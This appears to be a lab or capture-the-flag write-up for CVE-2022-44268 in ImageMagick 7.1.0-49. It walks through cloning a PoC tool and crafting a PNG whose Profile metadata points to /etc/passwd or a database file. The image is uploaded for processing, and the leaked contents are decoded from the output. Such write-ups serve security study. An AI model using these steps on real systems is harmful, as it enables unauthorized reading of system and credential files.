CVE-2022-44268 affects ImageMagick 7.1.0-49 and allows arbitrary file read through crafted PNG images. This exploit chain leverages two vulnerabilities:
- DoS via
-filename: Providing-as a filename causes the program to hang - LFI via Profile metadata: Injecting a
Profilefield into image metadata allows reading arbitrary files
- Target: ImageMagick 7.1.0-49 processing images
- Attack Vector: Malicious PNG with embedded Profile metadata
- Goal: Extract sensitive files (e.g.,
/etc/passwd,/var/db/pilgrimage)
# Clone the LFI PoC tool
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc
cd imagemagick-lfi-poc
# Install dependencies (if needed)
pip3 install pypng# Create PNG with Profile pointing to target file
python3 generate.py -f /etc/passwd -o exploit.pngThe script embeds Profile: /etc/passwd into the image metadata. When ImageMagick processes this image, it reads and includes the file contents.
# Upload the malicious PNG to the target system
# Wait for ImageMagick to process it (via cron job, web upload, etc.)# Download the processed image
# Extract metadata with verbose output
identify -verbose exploit.png > img.hex
# Convert hex dump to readable format
cat img.hex | xxd -r -p